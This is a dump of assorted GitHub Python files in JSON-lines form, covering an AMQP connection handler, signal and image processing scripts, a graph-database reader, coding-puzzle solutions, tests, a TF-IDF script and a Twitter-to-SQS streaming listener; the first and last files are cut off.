action_obj = self._actions.get_nowait()\n except Empty:\n break\n\n actions.append(action_obj)\n\n i += 1\n\n for action_obj in actions:\n if action_obj is None:\n return True\n\n action, future = action_obj\n result = None\n\n try:\n self._logger.log(5, \"Starting action %s\", action)\n\n if isinstance(action, _StartConsuming):\n result = self._start_consuming_threaded(channel, action)\n elif isinstance(action, _BindQueue):\n self._bind_queue_threaded(channel, action)\n elif isinstance(action, _AcknowledgeMessage):\n self._acknowledge_message_threaded(channel, action)\n elif isinstance(action, _PublishMessage):\n self._publish_message_threaded(channel, action)\n else:\n raise ValueError(\"Unknown action: %r\" % action)\n\n if future is not None:\n future.set_result(result)\n except (amqp.IrrecoverableConnectionError, amqp.IrrecoverableChannelError, ConnectionError) as err:\n if future is not None:\n future.set_exception(err)\n\n self._logger.error(\"Stopping connection because of irrecoverable error\", exc_info=True)\n return True\n except (amqp.exceptions.ConnectionForced, socket.error) as err:\n if future is not None:\n future.set_exception(err)\n\n self._logger.error(\"Connection closed from remote side: %s\", str(err))\n return True\n except Exception as err: #pylint:disable=broad-except;We need to return this exception to the caller in a future\n if future is not None:\n future.set_exception(err)\n else:\n self._logger.error(\"Error taking action %r\", action, exc_info=True)\n\n return False\n\n def _start_consuming_threaded(self, channel: amqp.Channel, action: _StartConsuming) -> str:\n tag = action.tag\n if tag is None:\n tag = ''\n\n tag = channel.basic_consume(action.queue, tag, callback=self._on_consumer_receive)\n self._logger.info(\"Started consumer (tag=%s) on queue %s\", tag, action.queue)\n\n return tag\n\n def _publish_message_threaded(self, channel: amqp.Channel, action: _PublishMessage):\n delivery_tag = self._next_message_tag\n self._next_message_tag += 1\n\n channel.basic_publish(action.message, exchange=action.exchange, routing_key=action.routing_key,\n immediate=False, mandatory=False)\n self._logger.log(5, \"Published message to %s:%s delivery_tag=%s\", action.exchange,\n action.routing_key, delivery_tag)\n\n if action.with_confirm:\n self._unconfirmed_publish[delivery_tag] = action.context\n else:\n self._unconfirmed_publish[delivery_tag] = self._IGNORE_CONFIRM\n\n def _bind_queue_threaded(self, channel: amqp.Channel, action: _BindQueue) -> None:\n channel.queue_declare(action.queue, exclusive=True)\n\n if action.binding_key is None:\n bindings = []\n elif isinstance(action.binding_key, str):\n bindings = [action.binding_key]\n else:\n bindings = action.binding_key\n\n for binding in bindings:\n channel.queue_bind(action.queue, action.exchange, binding)\n self._logger.info(\"Bound transient queue %s to exchange %s with key %s\",\n action.queue, action.exchange, binding)\n\n def _acknowledge_message_threaded(self, channel: amqp.Channel, action: _AcknowledgeMessage) -> None:\n channel.basic_ack(action.delivery_tag, action.multiple)\n self._logger.log(5, \"Acknowledged message with tag %d, multiple=%s\", action.delivery_tag, action.multiple)\n","repo_name":"IPCConnectedFactoryExchange/CFXRecorder","sub_path":"cfx_recorder/amqp/background_connection.py","file_name":"background_connection.py","file_ext":"py","file_size_in_byte":27294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11754470036","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\ndef plot_signal(signal, sampling_rate=64):\n \n # initialize parameters\n time = np.arange(0, len(signal)/sampling_rate, 1/sampling_rate)\n points = len(time)\n hz = np.linspace(0, sampling_rate/2, int(np.floor(points/2)+1))\n \n\n ax1= plt.subplot(211)\n ax1.plot(time, signal, 'b')\n ax1.set_title('Normally distributed: Time domain')\n ax1.set_xlabel('Time')\n ax1.set_ylabel('Amplitude')\n\n ax2 = plt.subplot(223)\n y, x = np.histogram(signal, bins=100)\n ax2.plot(x[1:], y, 'k')\n ax2.set_title('Signal histogram (distribution)')\n ax2.set_xlabel('Values')\n ax2.set_ylabel('N per bin')\n\n ax3 = plt.subplot(224)\n amp = np.abs(np.fft.fft(signal)/points)\n amp[2:] = 2*amp[2:]\n ax3.plot(hz, amp[:len(hz)], 'r')\n ax3.set_title('Frequency domain')\n ax3.set_xlabel('Frequency (Hz)')\n ax3.set_ylabel('Amplitude')\n\n plt.show()","repo_name":"krittaphascha/eeg_tutorial","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":932,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"69914679827","text":"from asyncio.exceptions import CancelledError\nfrom argo_dataflow_sdk import ProcessHandler\nimport asyncio\n\n\nasync def generator_handler():\n try:\n i = 0\n while True:\n print('running generator fn', i)\n yield f'Some Value {i}'.encode('UTF-8')\n i = i + 1\n await asyncio.sleep(1)\n except CancelledError:\n print('Generator function got cancelled, time to cleanup.')\n\nif __name__ == '__main__':\n processHandler = ProcessHandler()\n processHandler.start_generator(generator_handler)\n","repo_name":"argoproj-labs/old-argo-dataflow","sub_path":"sdks/python/tests/fixtures/generator_step_async_handler/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","stars":270,"dataset":"github-code","pt":"48"} +{"seq_id":"20941387620","text":"\"\"\"\nProject Euler (http://projecteuler.net/)\nProblem 22\n\"\"\"\n\nfrom contextlib import closing\nfrom urllib.request import urlopen\n\nURL = 'http://projecteuler.net/project/names.txt'\nwith closing(urlopen(URL)) as f:\n\tCONTENT = f.read().decode()\n\ndef solution():\n\tnames = sorted(x.strip('\"') for x in CONTENT.split(','))\n\twordval = lambda w: sum(ord(c)-64 for c in w)\n\n\treturn sum(i * wordval(n) for i,n in enumerate(names, 1))\n\nif __name__ == \"__main__\":\n print(solution())","repo_name":"tnaumann/ProjectEuler","sub_path":"problem022.py","file_name":"problem022.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"10997614320","text":"# pylint: disable=redefined-outer-name\n\"\"\"\nTest the numpy and scipy.sparse backend.\n\"\"\"\nimport pytest\nimport numpy as np\nimport numpy.testing as npt\nimport scipy as sp\n\nfrom .. import backend as bknd\n\n\n@pytest.fixture\ndef matrix():\n \"A sample matrix\"\n return np.array([[0, 3, 5],\n [2, 5, 0],\n [2, 0, 8]])\n\n\ndef test_inv_numpy(matrix):\n \"Calculate the inverse of a numpy array.\"\n size = matrix.shape[0]\n inv = bknd.inv(matrix)\n npt.assert_allclose(matrix.dot(inv), np.identity(size), atol=1e-10)\n\n\ndef test_inv_sparse(matrix):\n \"Calculate the inverse of a sparse matrix.\"\n size = matrix.shape[0]\n spmatrix = sp.sparse.csc_matrix(matrix)\n inv = bknd.inv(spmatrix)\n npt.assert_allclose(spmatrix.dot(inv).todense(), np.identity(size),\n atol=1e-10)\n\n\ndef test_solve_numpy(matrix):\n \"Solve a linear system with a numpy array matrix\"\n true_solution = np.array([5, 6, 7])\n rh_side = matrix.dot(true_solution)\n solution = bknd.solve(matrix, rh_side)\n npt.assert_allclose(matrix.dot(solution), rh_side)\n npt.assert_allclose(true_solution, solution)\n\n\ndef test_solve_sparse(matrix):\n \"Solve a linear system with a sparse matrix\"\n spmatrix = sp.sparse.csc_matrix(matrix)\n true_solution = np.array([5, 6, 7])\n rh_side = spmatrix.dot(true_solution)\n solution = bknd.solve(spmatrix, rh_side)\n npt.assert_allclose(spmatrix.dot(solution), rh_side)\n npt.assert_allclose(true_solution, solution)\n\n\ndef test_multiply(matrix):\n \"Element-wise multiplication using numpy arrays and scipy.sparse matrices\"\n true_solution = np.array([[0, 6, 15],\n [-2, 10, 0],\n [-2, 0, 24]])\n vector = np.array([-1, 2, 3])\n\n solution = bknd.multiply(matrix, vector)\n npt.assert_allclose(solution, true_solution)\n\n spmatrix = sp.sparse.csc_matrix(matrix)\n # Left multiply\n sp_solution = bknd.multiply(spmatrix, vector)\n npt.assert_allclose(sp_solution.todense(), true_solution)\n # Right multiply\n rsp_solution = bknd.multiply(vector, spmatrix)\n npt.assert_allclose(rsp_solution.todense(), true_solution)\n","repo_name":"opengeophysics/deeplook","sub_path":"deeplook/tests/test_backend.py","file_name":"test_backend.py","file_ext":"py","file_size_in_byte":2190,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"} +{"seq_id":"1005291760","text":"\"\"\" Module: reader\n\nProvide an API for retrieving data from a graph database, including\nget and multiget actions on nodes, edges, and paths.\n\nProvides:\n def get_node\n def get_nodes_by_index\n def multiget_node\n def get_edge\n def multiget_edge\n def get_path_to_neighbor_nodes\n def multiget_path_to_neighbor_nodes\n\n\"\"\"\nfrom model.constants import NODE_PROPERTY, EDGE_PROPERTY\nfrom model.data import database_manager\nfrom model.data.data_errors import DbInputError, DbReadError\n\nfrom constants import GRAPH_PROPERTY\nfrom model.graph import GraphEdge, GraphNode, GraphPath, GraphOutputError\n\n\ndef database():\n \"\"\" Get a database from the data layer's database_manager. \"\"\"\n return database_manager.database()\n\n\ndef get_node(node_id):\n \"\"\" Return a GraphNode from a graph database.\n\n Wrap a call to a graph database that returns a dict structured\n like the following, and parse it into a GraphNode:\n\n {\n \"id\" : node_id,\n \"type\" : type,\n \"properties\" : {\"p0\" : p0, ..., \"pN\" : pN},\n \"edges\" : {edge_id0 : edge_dict0, ..., edge_idN : edge_dictN}\n }\n\n Required:\n id node_id id of node to fetch\n\n Returns:\n GraphNode single GraphNode instance\n\n Raises:\n GraphOutputError bad input\n\n \"\"\"\n # cases:\n # 1/ success: dict returned;\n # 2/ id was bad: error raised, execution halted;\n # 3/ db fails: error caught, None assigned here.\n\n graph_node = None\n\n try:\n node_dict = database().read_node_and_edges(node_id)\n\n if node_dict:\n graph_node = _process_node(node_dict)\n\n except DbReadError as e:\n print(e.reason)\n #logger.debug(e.reason)\n\n except DbInputError as e:\n print(e.reason)\n #logger.debug(e.reason)\n\n return graph_node\n\n\ndef get_nodes_by_index(key, value, node_type_return_filter=None):\n \"\"\" Return a dict of GraphNodes from a graph database index.\n\n Wrap a call to a graph database that returns a dict structured\n like the following, and parse it into a GraphNode:\n\n {\n \"id\" : node_id,\n \"type\" : type,\n \"properties\" : {\"p0\" : p0, ..., \"pN\" : pN},\n \"edges\" : {edge_id0 : edge_dict0, ..., edge_idN : edge_dictN}\n }\n\n Required:\n str key indexed property key to look up\n mixed value indexed property value to look up\n\n Optional:\n list node_type_return_filter node types to filter for\n\n Returns:\n dict GraphNodes keyed on ID\n\n Raises:\n GraphOutputError bad input\n\n \"\"\"\n\n # cases:\n # 1/ success: dict returned;\n # 2/ k/v pair was bad: error raised, execution halted;\n # 3/ db fails: error caught, None assigned here.\n\n graph_nodes = None\n try:\n node_dicts = database().read_nodes_by_index(\n key,\n value,\n node_type_return_filter)\n if node_dicts is None:\n node_dicts = {}\n\n graph_nodes = {}\n for id, node_dict in node_dicts.items():\n graph_nodes[id] = _process_node(node_dict)\n\n except DbReadError as e:\n print(e.reason)\n #logger.debug(e.reason)\n\n except DbInputError as e:\n print(e.reason)\n #logger.debug(e.reason)\n\n return graph_nodes\n\n\ndef _process_node(node_dict):\n \"\"\" Convenience wrapper to validate and convert to a GraphNode. \"\"\"\n\n required_fields = set([\n NODE_PROPERTY.ID,\n NODE_PROPERTY.TYPE,\n NODE_PROPERTY.PROPERTIES,\n NODE_PROPERTY.EDGES,\n ])\n\n required_properties = set([\n GRAPH_PROPERTY.CREATED_TS,\n GRAPH_PROPERTY.UPDATED_TS,\n GRAPH_PROPERTY.DELETED_TS,\n ])\n\n # data layer nodes only have fields explicitly required\n errors = required_fields.symmetric_difference(set(node_dict))\n\n if NODE_PROPERTY.PROPERTIES not in errors:\n # ensure properties the graph layer requires are present too\n properties = set(node_dict[NODE_PROPERTY.PROPERTIES])\n property_errors = required_properties.difference(properties)\n errors = errors.union(property_errors)\n\n if errors:\n raise GraphOutputError(\n errors,\n \"Required fields or properties missing from GraphNode.\")\n\n return GraphNode(\n node_dict[NODE_PROPERTY.ID],\n node_dict[NODE_PROPERTY.TYPE],\n node_dict[NODE_PROPERTY.PROPERTIES],\n node_dict[NODE_PROPERTY.EDGES])\n\n\ndef multiget_node(node_ids):\n \"\"\" Return a dict of GraphNodes from a database keyed on id.\n\n Wrap a set of calls to a graph database that each return a dict\n structured like the one referenced in get_node(), and parse them\n into GraphNodes.\n\n Required:\n list node_ids list of ids of node to fetch\n\n Returns:\n dict GraphNodes keyed on node id\n\n \"\"\"\n\n nodes = {}\n\n for node_id in node_ids:\n nodes[node_id] = get_node(node_id)\n\n return nodes\n\n\ndef get_edge(edge_id):\n \"\"\" Return a GraphEdge from a graph database.\n\n Wrap a call to a graph database that returns a dict structured\n like the following, and parse it into a GraphEdge:\n\n {\n \"id\" : edge_id,\n \"type\" : type,\n \"properties\" : {\"p0\" : p0, ..., \"pN\" : pN},\n \"from_node_id\" : from_node_id,\n \"to_node_id\" : to_node_id\n }\n\n Required:\n id edge_id id of edge to fetch\n\n Returns:\n GraphEdge single GraphEdge instance\n\n \"\"\"\n\n # cases:\n # 1/ success: dict returned;\n # 2/ id was bad: error raised, execution halted;\n # 3/ db fails: error caught, None assigned here.\n\n edge = None\n\n required_fields = set([\n EDGE_PROPERTY.ID,\n EDGE_PROPERTY.TYPE,\n EDGE_PROPERTY.PROPERTIES,\n EDGE_PROPERTY.FROM_NODE_ID,\n EDGE_PROPERTY.TO_NODE_ID\n ])\n\n required_properties = set([\n GRAPH_PROPERTY.CREATED_TS,\n GRAPH_PROPERTY.UPDATED_TS,\n GRAPH_PROPERTY.DELETED_TS\n #GRAPH_PROPERTY.IS_ONE_WAY,\n #GRAPH_PROPERTY.IS_UNIQUE\n ])\n\n try:\n edge_dict = database().read_edge(edge_id)\n\n if edge_dict:\n # data layer edges only have fields explicitly required\n errors = required_fields.symmetric_difference(set(edge_dict))\n\n if EDGE_PROPERTY.PROPERTIES not in errors:\n # ensure properties the graph layer requires are present too\n properties = set(edge_dict[EDGE_PROPERTY.PROPERTIES])\n property_errors = required_properties.difference(properties)\n errors = errors.union(property_errors)\n\n if errors:\n raise GraphOutputError(\n errors,\n \"Required fields/properties missing from GraphEdge.\")\n\n edge = GraphEdge(\n edge_dict[EDGE_PROPERTY.ID],\n edge_dict[EDGE_PROPERTY.TYPE],\n edge_dict[EDGE_PROPERTY.PROPERTIES],\n edge_dict[EDGE_PROPERTY.FROM_NODE_ID],\n edge_dict[EDGE_PROPERTY.TO_NODE_ID])\n\n except DbReadError as e:\n print(e.reason)\n #logger.debug(e.reason)\n\n except DbInputError as e:\n print(e.reason)\n #logger.debug(e.reason)\n\n return edge\n\n\ndef multiget_edge(edge_ids):\n \"\"\" Return a dict of GraphEdges from a database keyed on id.\n\n Wrap a set of calls to a graph database that each return a dict\n structured like the one referenced in get_edge(), and parse them\n into GraphEdges.\n\n Required:\n list edge_ids list of ids of edge to fetch\n\n Returns:\n dict GraphEdges keyed on edge id\n\n \"\"\"\n\n edges = {}\n\n for edge_id in edge_ids:\n edges[edge_id] = get_edge(edge_id)\n\n return edges\n\n\n#def get_edges_for_node(node_id): pass\n#def multiget_edges_for_node(node_ids): pass\n\n\ndef get_path_to_neighbor_nodes(\n start_node_id,\n edge_type_pruner=None,\n node_type_return_filter=None):\n \"\"\" Traverse a depth-1 path from a start node to its neighbors.\n\n Wrap a call to a graph database that returns a dict structured\n like the following, and parse it into a GraphPath:\n\n {\n depth0 : {start_node_id : {start_node_dict}},\n depth1 : {node_id0 : {node_dict0}, ..., node_idN : {node_dictN}}\n }\n\n Required:\n id start_node_id start node id in a depth-1 path\n\n Optional:\n list edge_type_pruner list of edge types to traverse\n list node_type_return_filter list of node types to return\n\n Returns:\n GraphPath single GraphPath instance\n\n \"\"\"\n\n path = None\n\n try:\n # issue a db query to generate a path to neighbors\n path_dict = database().read_nodes_from_immediate_path(\n start_node_id,\n edge_type_pruner,\n node_type_return_filter)\n\n # FIXME: do similar checking to get_node() for path_dict[0]\n\n # instantiate all nodes and edges in one fell swoop\n path = GraphPath(start_node_id, path_dict)\n\n except DbReadError as e:\n print(e.reason)\n #logger.debug(e.reason)\n\n except DbInputError as e:\n print(e.reason)\n #logger.debug(e.reason)\n\n return path\n\n\ndef multiget_path_to_neighbor_nodes(\n start_node_ids,\n edge_type_pruner=None,\n node_type_return_filter=None):\n \"\"\" Traverse depth-1 paths from start nodes to their neighbors.\n\n Wrap a set of calls to a graph database that each return a dict\n structured like the one referenced in get_path_to_neighbor_nodes(),\n and parse them into GraphPaths.\n\n Required:\n list start_node_id start node id in a depth-1 path\n\n Optional:\n list edge_type_pruner list of edge types to traverse\n list node_type_return_filter list of node types to return\n\n Returns:\n dict GraphPaths keyed on start node id\n\n \"\"\"\n\n paths = {}\n\n for start_node_id in start_node_ids:\n paths[start_node_id] = get_path_to_neighbor_nodes(\n start_node_id,\n edge_type_pruner,\n node_type_return_filter)\n\n return paths\n","repo_name":"scrbrd/scoreboard","sub_path":"model/graph/reader.py","file_name":"reader.py","file_ext":"py","file_size_in_byte":10372,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"70214042707","text":"import cv2\nimport numpy as np\nimport glob\nfrom sklearn.cluster import KMeans\nimport cv2\n# import os\n## getting the mask from the rgb images\ndef preprocessing(img, i):\n # resizing using aspect ratio intact and finding the circle\n # reduce size retain aspect ratio intact\n # invert BGR 2 RGB\n RGB = cv2.cvtColor(img,cv2.COLOR_BGR2RGB) \n cv2.imwrite(\"/home/akash/Documents/Projects/unet/data/membrane/train1/image/%d.png\"%i, RGB)\n cv2.imwrite(\"/home/akash/Documents/Projects/unet/data/membrane/test1/%d.png\"%i, RGB)\n Ig = RGB[:, :, 2]\n # convert in to float and get log trasform for contrast streching\n g = 0.2 * (np.log(1 + np.float32(Ig)))\n normalized_image = cv2.normalize(g, None, 0, 255, cv2.NORM_MINMAX, dtype = cv2.CV_8U)\n # change into uint8\n cvuint = cv2.convertScaleAbs(normalized_image)\n # cvuint8.dtype\n ret, th = cv2.threshold(cvuint, 0, 255, cv2.THRESH_OTSU)\n ret1,th1 = cv2.threshold(Ig,0,255,cv2.THRESH_OTSU)\n # closeing operation\n # from skimage.morphology import disk\n # from skimage.morphology import erosion, dilation, opening, closing, white_tophat\n # selem = disk(30)\n # cls = opening(th, selem)\n # plot_comparison(orig_phantom, eroded, 'erosion')\n # in case using opencv\n kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (35,35))\n cls = cv2.morphologyEx(th, cv2.MORPH_OPEN, kernel)\n #Im = cls*rz # the mask with resize image\n # cv2.imwrite('mynew.jpg', mask)\n return (th,th1,cls,normalized_image,RGB)\nimport argparse\nimport sys\nap = argparse.ArgumentParser()\nap.add_argument(\"-i\", \"--image\", required = True, help = \"Path to the image\") \nap.add_argument(\"-n\", \"--num\", required = True, help = \"num\")\nargs = vars(ap.parse_args())\n\npath_dir = (args[\"image\"])\nprint(path_dir)\ni = (int)(args[\"num\"])\nprint('running code....')\nimg = cv2.imread(path_dir)\n(th,th1,cls,g,RGB) = preprocessing(img, i)\nfrom matplotlib import pyplot as plt\n # plt.imshow(cls)\n # plt.show()\n # cv2.imshow('asd',cls)\n # cv2.waitKey(0)\n # cv2.destroyAllWindows()\n # plot the data\ntitles = ['Original Image', 'log_transform','mask using logT','mask without log_T ']\nimages = [RGB,g,cls,th]\ncv2.imwrite('/home/akash/Documents/Projects/unet/data/membrane/train1/label/%d.png'%i, g)\nfor i in range(0,len(images)):\n print(i)\n plt.subplot(2, 3, i + 1)\n plt.imshow((images[i]),'gray')\n plt.title(titles[i]) \n plt.xticks([]), plt.yticks([])\n\n\nplt.show()\n","repo_name":"akashsmaran/DatasetBuilder","sub_path":"test/kmeans2.py","file_name":"kmeans2.py","file_ext":"py","file_size_in_byte":2465,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"1495070823","text":"class Solution:\n def isAlienSorted(self, words: List[str], order: str) -> bool:\n dic={}\n j=0\n for i in order:\n dic[i]=j\n j+=1\n for i in range(len(words)-1):\n w1,w2=words[i],words[i+1]\n for j in range(len(w1)):\n if j==len(w2):\n return False\n if w1[j] != w2[j]:\n if dic[w2[j]] < dic[w1[j]]:\n return False\n break\n return True\n ","repo_name":"AsmaKacem1/Leetcode","sub_path":"0953-verifying-an-alien-dictionary/0953-verifying-an-alien-dictionary.py","file_name":"0953-verifying-an-alien-dictionary.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"17711168376","text":"import pytest\n\nimport numpy as np\n\nfrom cysounddevice import types\nfrom _test_conversion import BufferWrapper, build_buffer\n\ndef build_signal(fs, length, nchannels, fc=1000):\n t = np.arange(length) / fs\n a = np.sin(2*np.pi*fc*t)\n result = np.zeros((nchannels, length), dtype=a.dtype)\n roll_factor = int(length / nchannels // 2)\n for i in range(nchannels):\n result[i,:] = np.roll(a, i * roll_factor)\n return np.asarray(result, dtype='float32')\n\ndef test_converters(sample_rate, block_size, sample_format):\n NCHANNELS_LIST = [1,2,4,8]\n FC_LIST = [500, 1000, 10000]\n NBLOCKS = 8\n\n sig_array = np.zeros((max(NCHANNELS_LIST), len(FC_LIST), NBLOCKS, block_size), dtype=np.float32)\n\n for i, fc in enumerate(FC_LIST):\n for j in range(NBLOCKS):\n sig = build_signal(sample_rate, block_size, max(NCHANNELS_LIST), fc)\n sig_array[:,i,j,:] = sig\n\n nse = np.random.uniform(-.5, .5, sig_array.shape)\n sig_array *= nse\n sig_array *= .9\n\n ptp = 2 ** sample_format['bit_width']\n tolerance = 1. / (ptp / 2)\n\n for i, nchannels in enumerate(NCHANNELS_LIST):\n\n print(f'sample_format={sample_format}, nchannels={nchannels}')\n\n bfr = build_buffer(sample_rate, block_size, nchannels, sample_format['name'])\n\n for j, fc in enumerate(FC_LIST):\n\n sig = sig_array[:nchannels,j]\n sig_orig = np.array(sig.tolist(), dtype='float32')\n\n packed = bfr.pack_and_unpack_items(sig)\n\n if sample_format['name'] == 'float32':\n assert np.array_equal(sig_orig, packed)\n else:\n assert np.abs(sig_orig - packed).max() <= tolerance\n","repo_name":"nocarryr/cython-sounddevice","sub_path":"tests/test_conversion.py","file_name":"test_conversion.py","file_ext":"py","file_size_in_byte":1677,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"14251758290","text":"import time\nimport re\nimport string\nfrom collections import Counter\nimport math\n\nfrom nltk import WordNetLemmatizer\nimport numpy as np\nimport pandas as pd\nfrom nltk.corpus import stopwords\nfrom nltk.tokenize import word_tokenize\nfrom tqdm.auto import tqdm\n\n\ndef clean_docs(docs):\n final = []\n for doc in tqdm(docs):\n doc = doc.lower()\n clean_doc = doc.replace(\"redbull\", \"\")\n clean_doc = clean_doc.replace(\"red\", \"\")\n clean_doc = clean_doc.replace(\"bull\", \"\")\n\n final.append(clean_doc)\n return final\n\n\ndef calc_df_idfV2(documents, fichier_idf):\n filter_docs = []\n text_tokens_lemmatize = []\n\n new_stopwords = [\".\", \"n't\", \"?\", \"!\", \"...\", \",\", \";\", \":\", \")\", \"(\", \"&\", \"|\", \"..\"]\n stopwordsCustom = stopwords.words('english')\n for new_stop in new_stopwords:\n stopwordsCustom.append(new_stop)\n time.sleep(0.5)\n\n print(\"\\nClean Doc\")\n documents = clean_docs(documents)\n time.sleep(0.5)\n\n lemmatizer = WordNetLemmatizer()\n print(\"\\nTokenize\")\n for doc in tqdm(documents):\n text_tokens = word_tokenize(doc.lower())\n for words_before_lemmatize in text_tokens:\n if \"@\" or \"#\" not in words_before_lemmatize :\n text_tokens_lemmatize.append(lemmatizer.lemmatize(words_before_lemmatize, pos=\"v\"))\n filter_docs.append([word for word in text_tokens_lemmatize if not word in stopwordsCustom])\n time.sleep(0.5)\n\n words_set = set()\n for doc in filter_docs:\n words_set = words_set.union(doc)\n print('Nombre de mots total : ', len(words_set))\n time.sleep(0.5)\n\n n_docs = len(filter_docs) # ·Number of documents in the corpus\n print(f\"Nombre de document : {n_docs}\")\n time.sleep(0.5)\n\n # df_tf = pd.DataFrame(np.zeros((n_docs, n_words_set)), columns=words_set)\n\n #print(\"\\nCalcul DF :\")\n #for i in tqdm(range(n_docs)):\n # words = filter_docs[i] # Words in the document\n # for w in words:\n # df_tf[w][i] = df_tf[w][i] + (1 / len(words))\n #time.sleep(0.5)\n\n print(\"\\nCalcul IDF :\")\n idf = {}\n for w in tqdm(words_set):\n k = 0 # number of documents in the corpus that contain this word\n for i in range(n_docs):\n if w in filter_docs[i]:\n k += 1\n idf[w] = np.log10(n_docs / k)\n time.sleep(0.5)\n idf = dict(sorted(idf.items(), key=lambda item: item[1]))\n print(f\"\\nIDF inverse :\\n{idf}\")\n\n\n print(\"\\nÉcriture dans CSV\")\n fichier = open(fichier_idf, \"w\")\n fichier.write(\"mot;idf_inverse\\n\")\n for cle, valeur in tqdm(idf.items()):\n fichier.write(str(cle + \";\" + str(\"{:.12f}\".format(valeur)) + \"\\n\"))\n\n return 1\n","repo_name":"Dorian-RND/Big-Data","sub_path":"TF_IDF/Nouvelle_Version/df_idfV2.py","file_name":"df_idfV2.py","file_ext":"py","file_size_in_byte":2677,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35196628359","text":"import frappe\n\nfrom non_profit.setup import setup_non_profit\n\n\ndef get_company():\n\tcompany = frappe.defaults.get_defaults().company\n\tif company:\n\t\treturn company\n\telse:\n\t\tcompany = frappe.get_list(\"Company\", limit=1)\n\t\tif company:\n\t\t\treturn company[0].name\n\treturn None\n\n\ndef before_tests():\n\t# complete setup if missing\n\tfrom frappe.desk.page.setup_wizard.setup_wizard import setup_complete\n\tif not frappe.get_list(\"Company\"):\n\t\tsetup_complete({\n\t\t\t\"currency\" :\"USD\",\n\t\t\t\"full_name\" :\"Test User\",\n\t\t\t\"company_name\" :\"Frappe Care LLC\",\n\t\t\t\"timezone\" :\"America/New_York\",\n\t\t\t\"company_abbr\" :\"WP\",\n\t\t\t\"industry\" :\"Healthcare\",\n\t\t\t\"country\" :\"United States\",\n\t\t\t\"fy_start_date\" :\"2021-01-01\",\n\t\t\t\"fy_end_date\" :\"2021-12-31\",\n\t\t\t\"language\" :\"english\",\n\t\t\t\"company_tagline\" :\"Testing\",\n\t\t\t\"email\" :\"test@erpnext.com\",\n\t\t\t\"password\" :\"test\",\n\t\t\t\"chart_of_accounts\" : \"Standard\",\n\t\t\t\"domains\" : [\"Non Profit\"],\n\t\t})\n\t\tsetup_non_profit()\n","repo_name":"frappe/non_profit","sub_path":"non_profit/non_profit/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"48"} +{"seq_id":"13729801452","text":"from tweepy.streaming import StreamListener\nimport json\nimport boto3\nfrom . import configure\nmaxTweets = 100\n\nclass tweetListener(StreamListener):\n\n print('here')\n\n def __init__(self):\n self.sqs= boto3.client('sqs', region_name='us-east-1',aws_access_key_id= configure.aws_access_key_id,aws_secret_access_key= configure.aws_secret_access_key)\n self.index=0\n\n def on_data(self, __rawData):\n print('here0')\n if __rawData:\n __count = 0\n jsonData = json.loads(__rawData)\n if jsonData.get(\"user\") is not None and jsonData.get(\"user\").get(\"name\"):\n name = jsonData.get(\"user\").get(\"name\")\n __count = __count + 1\n print('here1')\n if jsonData.get(\"coordinates\"):\n geo = jsonData.get(\"coordinates\").get(\"coordinates\")\n long = geo[0]\n lan = geo[1]\n __count = __count + 1\n print('here2')\n elif jsonData.get(\"place\"):\n geo = jsonData.get(\"place\").get(\"bounding_box\").get(\"coordinates\")[0]\n long = geo[0][0]\n lan = geo[0][1]\n __count = __count + 1\n print('here3')\n if jsonData.get(\"text\"):\n content = jsonData.get(\"text\")\n __count = __count + 1\n\n if jsonData.get(\"timestamp_ms\"):\n time = jsonData.get(\"timestamp_ms\")\n __count = __count + 1\n print('here4')\n\n if __count == 4 and jsonData.get('lang')=='en' :\n print('here5')\n self.index = self.index % maxTweets + 1\n attributes = {\"username\":{\"StringValue\":name,\"DataType\":\"String\"},\n \"lan\":{\"StringValue\":str(lan),\"DataType\":\"String\"},\n \"lon\":{\"StringValue\":str(lan),\"DataType\":\"String\"},\n \"timestamp\":{\"StringValue\":time,\"DataType\":\"String\"}\n }\n\n self.sqs.send_message(QueueUrl=configure.sqs_arn, MessageBody=content, MessageAttributes=attributes)\n print('here7')\n\n {\"created_at\": \"Thu Apr 20 19:41:13 +0000 2017\", \"id\": 855144341534371841, \"id_str\": \"855144341534371841\",\n \"text\": \"\\ud83d\\ude04 https:\\/\\/t.co\\/rIuwfNs4IY\", \"display_text_range\": [0, 1],\n \"source\": \"\\u003ca href=\\\"http:\\/\\/twitter.com\\/download\\/iphone\\\" rel=\\\"nofollow\\\"\\u003eTwitter for iPhone\\u003c\\/a\\u003e\",\n \"truncated\": false, \"in_reply_to_status_id\": null, \"in_reply_to_status_id_str\": null,\n \"in_reply_to_user_id\": null, \"in_reply_to_user_id_str\": null, \"in_reply_to_screen_name\": null,\n \"user\": {\"id\": 2360637557, \"id_str\": \"2360637557\", \"name\": \"mila\", \"screen_name\": \"maykiiix\",\n \"location\": \"adapazar\\u0131 \", \"url\": null, \"description\": \"\\u03dc\\u03d3\\u017f\\u03de\",\n \"protected\": false, \"verified\": false, \"followers_count\": 310, \"friends_count\": 120,\n \"listed_count\": 0, \"favourites_count\": 4324, \"statuses_count\": 220,\n \"created_at\": \"Sun Feb 23 11:28:02 +0000 2014\", \"utc_offset\": 10800, \"time_zone\": \"Kyiv\",\n \"geo_enabled\": true, \"lang\": \"tr\", \"contributors_enabled\": false, \"is_translator\": false,\n \"profile_background_color\": \"C0DEED\",\n \"profile_background_image_url\": 